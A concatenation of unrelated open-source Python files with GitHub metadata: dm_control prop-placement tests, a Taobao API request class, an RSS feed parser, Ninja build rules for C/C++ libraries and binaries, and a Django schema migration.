                                           random_state=random_state,
                                           learning_rate=learning_rate,
                                           eta0=eta0, power_t=power_t,
                                           warm_start=warm_start,
                                           average=average, n_iter=n_iter)
| {
"content_hash": "e2525c7eb4e76d18e99387f5f0b0312f",
"timestamp": "",
"source": "github",
"line_count": 1340,
"max_line_length": 79,
"avg_line_length": 41.50820895522388,
"alnum_prop": 0.5563905719062944,
"repo_name": "clemkoa/scikit-learn",
"id": "68c2704860ec4063a13c4ab709982ca1ece08a19",
"size": "55771",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "sklearn/linear_model/stochastic_gradient.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "451996"
},
{
"name": "C++",
"bytes": "140322"
},
{
"name": "Makefile",
"bytes": "1512"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "7322224"
},
{
"name": "Shell",
"bytes": "20749"
}
],
"symlink_target": ""
} |
"""Tests for prop_initializer."""
from absl.testing import absltest
from absl.testing import parameterized
from dm_control import composer
from dm_control import mjcf
from dm_control.composer.initializers import prop_initializer
from dm_control.composer.variation import distributions
from dm_control.entities import props
import numpy as np
class _SequentialChoice(distributions.Distribution):
  """Helper class to return samples in order for deterministic testing."""
  __slots__ = ()

  def __init__(self, choices, single_sample=False):
    super().__init__(choices, single_sample=single_sample)
    # Index of the next choice to hand out; advances with wraparound on
    # every call of the sampling callable produced by `_callable`.
    self._idx = 0

  def _callable(self, random_state):
    # `random_state` is intentionally unused: sampling is deterministic.
    def next_item(*args, **kwargs):
      del args, kwargs  # Unused.
      result = self._args[0][self._idx]
      self._idx = (self._idx + 1) % len(self._args[0])
      return result
    return next_item
def _make_spheres(num_spheres, radius, nconmax):
  """Builds an arena with free sphere props above a ground plane.

  Returns a `(physics, spheres)` tuple, where `spheres` is the list of
  `props.Primitive` entities added to the arena.
  """
  arena = composer.Arena()
  # Ground plane sits below the spheres so they can fall and settle.
  arena.mjcf_model.worldbody.add('geom', type='plane', size=[1, 1, 0.1],
                                 pos=[0., 0., -2 * radius], name='ground')
  spheres = [
      props.Primitive(geom_type='sphere', size=[radius],
                      name='sphere_{}'.format(idx))
      for idx in range(num_spheres)
  ]
  for prop in spheres:
    arena.add_free_entity(prop)
  arena.mjcf_model.size.nconmax = nconmax
  physics = mjcf.Physics.from_mjcf_model(arena.mjcf_model)
  return physics, spheres
class PropPlacerTest(parameterized.TestCase):
  """Tests for PropPlacer."""

  def assertNoContactsInvolvingEntities(self, physics, entities):
    """Fails if any geom belonging to `entities` is in an active contact."""
    all_colliding_geoms = set()
    for contact in physics.data.contact:
      all_colliding_geoms.add(contact.geom1)
      all_colliding_geoms.add(contact.geom2)
    for entity in entities:
      entity_geoms = physics.bind(entity.mjcf_model.find_all('geom')).element_id
      colliding_entity_geoms = all_colliding_geoms.intersection(entity_geoms)
      if colliding_entity_geoms:
        names = ', '.join(
            physics.model.id2name(i, 'geom') for i in colliding_entity_geoms)
        self.fail('Entity {} has colliding geoms: {}'
                  .format(entity.mjcf_model.model, names))

  def assertPositionsWithinBounds(self, physics, entities, lower, upper):
    """Fails if any entity's position lies outside [lower, upper]."""
    for entity in entities:
      position, _ = entity.get_pose(physics)
      if np.any(position < lower) or np.any(position > upper):
        self.fail('Entity {} is out of bounds: position={}, bounds={}'
                  .format(entity.mjcf_model.model, position, (lower, upper)))

  def test_sample_non_colliding_positions(self):
    halfwidth = 0.05
    radius = halfwidth / 4.
    # Sampling box is offset upward so spheres can be placed contact-free.
    offset = np.array([0, 0, halfwidth + radius*1.1])
    lower = -np.full(3, halfwidth) + offset
    upper = np.full(3, halfwidth) + offset
    position_variation = distributions.Uniform(lower, upper)
    physics, spheres = _make_spheres(num_spheres=8, radius=radius, nconmax=1000)
    prop_placer = prop_initializer.PropPlacer(
        props=spheres,
        position=position_variation,
        ignore_collisions=False,
        settle_physics=False)
    prop_placer(physics, random_state=np.random.RandomState(0))
    self.assertNoContactsInvolvingEntities(physics, spheres)
    self.assertPositionsWithinBounds(physics, spheres, lower, upper)

  def test_rejection_sampling_failure(self):
    max_attempts_per_prop = 2
    fixed_position = (0, 0, 0.1)  # Guaranteed to always have collisions.
    physics, spheres = _make_spheres(num_spheres=2, radius=0.01, nconmax=1000)
    prop_placer = prop_initializer.PropPlacer(
        props=spheres,
        position=fixed_position,
        ignore_collisions=False,
        max_attempts_per_prop=max_attempts_per_prop)
    expected_message = prop_initializer._REJECTION_SAMPLING_FAILED.format(
        model_name=spheres[1].mjcf_model.model,  # Props are placed in order.
        max_attempts=max_attempts_per_prop)
    with self.assertRaisesWithLiteralMatch(RuntimeError, expected_message):
      prop_placer(physics, random_state=np.random.RandomState(0))

  def test_ignore_contacts_with_entities(self):
    physics, spheres = _make_spheres(num_spheres=2, radius=0.01, nconmax=1000)
    # Target position of both spheres (non-colliding).
    fixed_positions = [(0, 0, 0.1), (0, 0.1, 0.1)]
    # Placer that initializes both spheres to (0, 0, 0.1), ignoring contacts.
    prop_placer_init = prop_initializer.PropPlacer(
        props=spheres,
        position=fixed_positions[0],
        ignore_collisions=True,
        max_attempts_per_prop=1)
    # Sequence of placers that will move the spheres to their target positions.
    prop_placer_seq = []
    for prop, target_position in zip(spheres, fixed_positions):
      placer = prop_initializer.PropPlacer(
          props=[prop],
          position=target_position,
          ignore_collisions=False,
          max_attempts_per_prop=1)
      prop_placer_seq.append(placer)
    # We expect the first placer in the sequence to fail without
    # `ignore_contacts_with_entities` because the second sphere is already at
    # the same location.
    prop_placer_init(physics, random_state=np.random.RandomState(0))
    expected_message = prop_initializer._REJECTION_SAMPLING_FAILED.format(
        model_name=spheres[0].mjcf_model.model, max_attempts=1)
    with self.assertRaisesWithLiteralMatch(RuntimeError, expected_message):
      prop_placer_seq[0](physics, random_state=np.random.RandomState(0))
    # Placing the first sphere should succeed if we ignore contacts involving
    # the second sphere.
    prop_placer_init(physics, random_state=np.random.RandomState(0))
    prop_placer_seq[0](physics, random_state=np.random.RandomState(0),
                       ignore_contacts_with_entities=[spheres[1]])
    # Now place the second sphere with all collisions active.
    prop_placer_seq[1](physics, random_state=np.random.RandomState(0),
                       ignore_contacts_with_entities=None)
    self.assertNoContactsInvolvingEntities(physics, spheres)

  @parameterized.parameters([False, True])
  def test_settle_physics(self, settle_physics):
    radius = 0.1
    physics, spheres = _make_spheres(num_spheres=2, radius=radius, nconmax=1)
    # Only place the first sphere.
    prop_placer = prop_initializer.PropPlacer(
        props=spheres[:1],
        position=np.array([2.01 * radius, 0., 0.]),
        settle_physics=settle_physics)
    prop_placer(physics, random_state=np.random.RandomState(0))
    first_position, first_quaternion = spheres[0].get_pose(physics)
    del first_quaternion  # Unused.
    # If we allowed the physics to settle then the first sphere should be
    # resting on the ground, otherwise it should be at the target height.
    expected_first_z_pos = -radius if settle_physics else 0.
    self.assertAlmostEqual(first_position[2], expected_first_z_pos, places=3)
    second_position, second_quaternion = spheres[1].get_pose(physics)
    del second_quaternion  # Unused.
    # The sphere that we were not placing should not have moved.
    self.assertEqual(second_position[2], 0.)

  @parameterized.parameters([0, 1, 2, 3])
  def test_settle_physics_multiple_attempts(self, max_settle_physics_attempts):
    # Tests the multiple-reset mechanism for `settle_physics`.
    # Rather than testing the mechanic itself, which is tested above, we instead
    # test that the mechanism correctly makes several attempts when it fails
    # to settle. We force it to fail by making the settling time short, and
    # test that the position is repeatedly called using a deterministic
    # sequential pose distribution.
    radius = 0.1
    physics, spheres = _make_spheres(num_spheres=1, radius=radius, nconmax=1)
    # Generate sequence of positions that will be sampled in order.
    positions = [
        np.array([2.01 * radius, 1., 0.]),
        np.array([2.01 * radius, 2., 0.]),
        np.array([2.01 * radius, 3., 0.]),
    ]
    positions_dist = _SequentialChoice(positions)
    def build_placer():
      return prop_initializer.PropPlacer(
          props=spheres[:1],
          position=positions_dist,
          settle_physics=True,
          max_settle_physics_time=1e-6,  # To ensure that settling FAILS.
          max_settle_physics_attempts=max_settle_physics_attempts)
    if max_settle_physics_attempts == 0:
      with self.assertRaises(ValueError):
        build_placer()
    else:
      prop_placer = build_placer()
      prop_placer(physics, random_state=np.random.RandomState(0))
      first_position, first_quaternion = spheres[0].get_pose(physics)
      del first_quaternion  # Unused.
      # Each failed settling attempt draws the next position in sequence, so
      # the final y-coordinate equals the number of attempts made.
      expected_first_y_pos = max_settle_physics_attempts
      self.assertAlmostEqual(first_position[1], expected_first_y_pos, places=3)
# Allow running this test module directly.
if __name__ == '__main__':
  absltest.main()
| {
"content_hash": "60688cfd8c7f1d6173426153a0bd4130",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 80,
"avg_line_length": 41.3287037037037,
"alnum_prop": 0.6845524812366977,
"repo_name": "deepmind/dm_control",
"id": "ac4acc09fcee5acf588496eec7010510dc31842e",
"size": "9594",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "dm_control/composer/initializers/prop_initializer_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "136624"
},
{
"name": "Python",
"bytes": "2097331"
}
],
"symlink_target": ""
} |
'''
Created by auto_sdk on 2014.11.07
'''
from top.api.base import RestApi
class TmallBrandcatControlGetRequest(RestApi):
  """TOP API request wrapper for 'tmall.brandcat.control.get'."""

  def __init__(self, domain='gw.api.taobao.com', port=80):
    # Endpoint/transport setup is handled entirely by the REST base class.
    super(TmallBrandcatControlGetRequest, self).__init__(domain, port)

  def getapiname(self):
    # API method identifier sent to the Taobao gateway.
    return 'tmall.brandcat.control.get'
| {
"content_hash": "4c3e435b06abd754ec34383fbc915c0f",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 55,
"avg_line_length": 28.8,
"alnum_prop": 0.7048611111111112,
"repo_name": "colaftc/webtool",
"id": "03f96cff948ad99caad7f1440a695869c7ed1e91",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "top/api/rest/TmallBrandcatControlGetRequest.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12208"
},
{
"name": "HTML",
"bytes": "16773"
},
{
"name": "JavaScript",
"bytes": "2571"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "258023"
},
{
"name": "Ruby",
"bytes": "861"
},
{
"name": "VimL",
"bytes": "401921"
}
],
"symlink_target": ""
} |
def extractDmtranslationscnWordpressCom(item):
    '''
    Parser for 'dmtranslationscn.wordpress.com'
    '''
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or "preview" in item['title'].lower():
        return None

    # Tag-based series mapping; every series on this site is a translation.
    tag_releases = [
        ('TSLDB', 'The Strongest Legend of Dragon Ball'),
        ('OPTS', 'One Piece Talent System'),
        ('GGS', 'Galactic Garbage Station'),
        ('HOM', 'Heroes of Marvel'),
        ('ephs', 'Endless Plunder In High School DxD'),
        ('optm', 'One Piece – Thundergod Marine'),
    ]
    item_tags = item['tags']
    for tag, series in tag_releases:
        if tag in item_tags:
            return buildReleaseMessageWithType(
                item, series, vol, chp, frag=frag, postfix=postfix,
                tl_type='translated')

    # Title-based fallback applies only to otherwise-uncategorized posts.
    if item_tags != ['Uncategorized']:
        return False
    title_releases = [
        ('Time Traveler V', 'Time Traveler'),
    ]
    lowered_title = item['title'].lower()
    for title_fragment, series in title_releases:
        if title_fragment.lower() in lowered_title:
            return buildReleaseMessageWithType(
                item, series, vol, chp, frag=frag, postfix=postfix,
                tl_type='translated')
    return False
"content_hash": "7e72c26e9226c1bfbaa73d10d12ca9b1",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 104,
"avg_line_length": 37,
"alnum_prop": 0.5726807888970051,
"repo_name": "fake-name/ReadableWebProxy",
"id": "b96edb52e79b43edd3c89534ddbed69cab76e14b",
"size": "1371",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "WebMirror/management/rss_parser_funcs/feed_parse_extractDmtranslationscnWordpressCom.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "105811"
},
{
"name": "Dockerfile",
"bytes": "1178"
},
{
"name": "HTML",
"bytes": "119737"
},
{
"name": "JavaScript",
"bytes": "3006524"
},
{
"name": "Jupyter Notebook",
"bytes": "148075"
},
{
"name": "Mako",
"bytes": "1454"
},
{
"name": "Python",
"bytes": "5264346"
},
{
"name": "Shell",
"bytes": "1059"
}
],
"symlink_target": ""
} |
"""Build rules for C/C++."""
__all__ = [
'init',
]
import itertools
import iga.filetype
from iga.core import ImmutableOrderedSet
from iga.core import group
from iga.core import traverse
from iga.fargparse import oneof
from iga.label import Label
from iga.ninja import NinjaBuildstmt
from iga.ninja import NinjaRule
from iga.path import Glob
from iga.rule import Rule
from iga.rule import RuleData
from iga.rule import RuleFunc
from iga.rule import RuleType
# File-type identifiers used to classify rule inputs and outputs.
CC_SOURCE = 'cc_source'
CC_HEADER = 'cc_header'
CC_OBJECT = 'cc_object'
CC_LIBRARY = 'cc_library'
CC_BINARY = 'cc_binary'
# Filename suffixes recognized for each input type (registered in init()).
CC_SUFFIXES = {
    CC_LIBRARY: {'.a'},
    CC_SOURCE: {'.c', '.cc', '.cpp', '.cxx', '.C'},
    CC_HEADER: {'.h', '.hh', '.hpp', '.hxx', '.inc'},
}
def init():
    """Init C/C++ build rules."""
    # Compile rule: emits a gcc-style depfile so ninja tracks header deps.
    NinjaRule.register(NinjaRule.make(
        name=CC_OBJECT,
        command='$cxx -MMD -MT $out -MF $out.d $cflags -c $in -o $out',
        description='CXX $out',
        depfile='$out.d',
        deps='gcc',
    ))
    # Archive rule: removes any stale archive before rebuilding it.
    NinjaRule.register(NinjaRule.make(
        name=CC_LIBRARY,
        command='rm -f $out && $ar crs $out $in',
        description='AR $out',
    ))
    # Link rule for final executables.
    NinjaRule.register(NinjaRule.make(
        name=CC_BINARY,
        command='$cxx $ldflags -o $out $in $libs',
        description='LINK $out',
    ))
    # Register filename-suffix -> file-type mappings.
    for input_type, suffixes in CC_SUFFIXES.items():
        for suffix in suffixes:
            iga.filetype.add_suffix(input_type, suffix)
    RuleType.register(RuleType.make(
        name=CC_LIBRARY,
        input_types=[CC_LIBRARY, CC_SOURCE, CC_HEADER],
        output_types=[CC_LIBRARY, CC_OBJECT],
        make_outputs=make_outputs,
        ninja_rules=[CC_OBJECT, CC_LIBRARY],
        generate_buildstmts=generate_library,
    ))
    RuleType.register(RuleType.make(
        name=CC_BINARY,
        input_types=[CC_LIBRARY, CC_SOURCE, CC_HEADER],
        output_types=[CC_BINARY, CC_OBJECT],
        make_outputs=make_outputs,
        ninja_rules=[CC_OBJECT, CC_BINARY],
        generate_buildstmts=generate_binary,
    ))
    RuleFunc.register(RuleFunc.make(cc_library))
    RuleFunc.register(RuleFunc.make(cc_binary))
def make_outputs(inputs):
    """Derive implicit outputs: one object file per C/C++ source input."""
    objects = [source.with_suffix('.o') for source in inputs[CC_SOURCE]]
    return {CC_OBJECT: objects}
def cc_library(
        name: Label,
        srcs: [oneof(Label, Glob)]=(),
        deps: [Label]=()):
    """Rule function declaring a static C/C++ library target."""
    # Partition srcs into concrete labels vs. glob patterns, then classify
    # the concrete labels by file type (source/header/library).
    srcs = group(srcs, key=type, as_dict=False)
    inputs = group(srcs[Label], key=iga.filetype.get, as_dict=False)
    inputs[CC_LIBRARY] += deps
    return RuleData.make(
        rule_type=CC_LIBRARY,
        name=name,
        inputs=inputs,
        input_patterns=srcs[Glob],
        # Output artifact is `libNAME.a` alongside the target label.
        outputs={CC_LIBRARY: [name.with_name(_lib(name.name))]},
    )
def cc_binary(
        name: Label,
        srcs: [oneof(Label, Glob)]=(),
        deps: [Label]=()):
    """Rule function declaring a C/C++ executable target."""
    # Mirrors cc_library: split labels from globs, classify by file type.
    srcs = group(srcs, key=type, as_dict=False)
    inputs = group(srcs[Label], key=iga.filetype.get, as_dict=False)
    inputs[CC_LIBRARY] += deps
    return RuleData.make(
        rule_type=CC_BINARY,
        name=name,
        inputs=inputs,
        input_patterns=srcs[Glob],
        outputs={CC_BINARY: [name]},
    )
def generate_objects(rule):
    """Yield one compile buildstmt per C/C++ source file of `rule`."""
    # Headers are implicit deps: they trigger recompiles but are not
    # passed on the compiler command line.
    header_deps = rule.inputs[CC_HEADER]
    yield from (
        NinjaBuildstmt.make(
            ninja_rule=CC_OBJECT,
            outputs=[source.with_suffix('.o')],
            explicit_deps=[source],
            implicit_deps=header_deps,
        )
        for source in rule.inputs[CC_SOURCE]
    )
def generate_library(rule):
    """Yield buildstmts that compile sources and archive them into a .a."""
    yield from generate_objects(rule)
    yield NinjaBuildstmt.make(
        ninja_rule=CC_LIBRARY,
        outputs=rule.outputs[CC_LIBRARY],
        explicit_deps=rule.outputs[CC_OBJECT],
    )
def generate_binary(rule):
    """Yield buildstmts that compile sources and link the executable."""
    yield from generate_objects(rule)
    # Retrieve the transitive closure of dependent CC_LIBRARY rules.
    deps = list(map(
        Rule.get_object,
        ImmutableOrderedSet(itertools.chain.from_iterable(
            traverse(label, _get_labels) for label in rule.inputs[CC_LIBRARY]
        ))
    ))
    # Every library artifact contributes a -L (its directory) and a -l
    # (its name without the lib/.a decorations) to the link line.
    outputs = [label for dep in deps for label in dep.outputs[CC_LIBRARY]]
    ldflags = ' '.join('-L%s' % label.path.parent for label in outputs)
    libs = ' '.join('-l%s' % _unlib(label.name) for label in outputs)
    yield NinjaBuildstmt.make(
        ninja_rule=CC_BINARY,
        outputs=rule.outputs[CC_BINARY],
        explicit_deps=rule.outputs[CC_OBJECT],
        # Relink when any dependent library changes.
        implicit_deps=outputs,
        variables={
            'ldflags': '$ldflags ' + ldflags,
            'libs': libs,
        },
    )
def _get_labels(label):
    """Return the names of the CC_LIBRARY inputs of the rule named `label`."""
    rule = Rule.get_object(label)
    return [Rule.get_object(dep).name for dep in rule.inputs[CC_LIBRARY]]
def _lib(name):
return 'lib%s.a' % name
def _unlib(name):
"""Inverse of _lib()."""
assert name.startswith('lib') and name.endswith('.a')
return name[3:-2]
| {
"content_hash": "e5b465039acfd05342fbedfdacb84800",
"timestamp": "",
"source": "github",
"line_count": 179,
"max_line_length": 77,
"avg_line_length": 27.083798882681563,
"alnum_prop": 0.6062293729372937,
"repo_name": "clchiou/iga",
"id": "abef55247b3955119a2e4b790690f57ea62c4ee6",
"size": "4848",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "iga/rules/cc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "160"
},
{
"name": "C++",
"bytes": "86"
},
{
"name": "Python",
"bytes": "57726"
},
{
"name": "Shell",
"bytes": "155"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration; do not edit operations by hand."""

    dependencies = [
        ('core', '0042_auto_20150516_0737'),
    ]
    operations = [
        # Rename loanaccount.state -> loanaccount.status.
        migrations.RenameField(
            model_name='loanaccount',
            old_name='state',
            new_name='status',
        ),
        # New classification field; existing rows default to 'Good Loan'.
        migrations.AddField(
            model_name='loanaccount',
            name='loss_reserve_category',
            field=models.IntegerField(default=1, choices=[(1, b'Good Loan'), (2, b'Doubtful (Past Due)'), (3, b'Written-down'), (4, b'Charged-off')]),
        ),
        # Updated role choices; default role is now 6 ('Member')? NOTE(review):
        # default=7 has no matching choice in the list — confirm intended.
        migrations.AlterField(
            model_name='member',
            name='role',
            field=models.IntegerField(default=7, choices=[(0, b'Finance Committee'), (1, b'Audit and Supervision Committee'), (2, b'General Manager/CEO'), (3, b'Accountant'), (4, b'Cashier'), (5, b"Accountant's Assistant"), (6, b'Member')]),
        ),
        migrations.AlterField(
            model_name='memberprofile',
            name='surname',
            field=models.CharField(max_length=30, null=True, verbose_name=b'Surname', blank=True),
        ),
    ]
| {
"content_hash": "fd4ab18c25158daef2174c5ef096c9ca",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 241,
"avg_line_length": 35.93939393939394,
"alnum_prop": 0.5733558178752108,
"repo_name": "AjabWorld/ajabsacco",
"id": "0c9f4736f3e5cc6f0269fd24bffad5a5d830837c",
"size": "1210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ajabsacco/core/migrations/0043_auto_20150516_2246.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "125805"
},
{
"name": "HTML",
"bytes": "145914"
},
{
"name": "JavaScript",
"bytes": "37295"
},
{
"name": "Python",
"bytes": "335561"
},
{
"name": "Ruby",
"bytes": "2169"
},
{
"name": "Shell",
"bytes": "1331"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.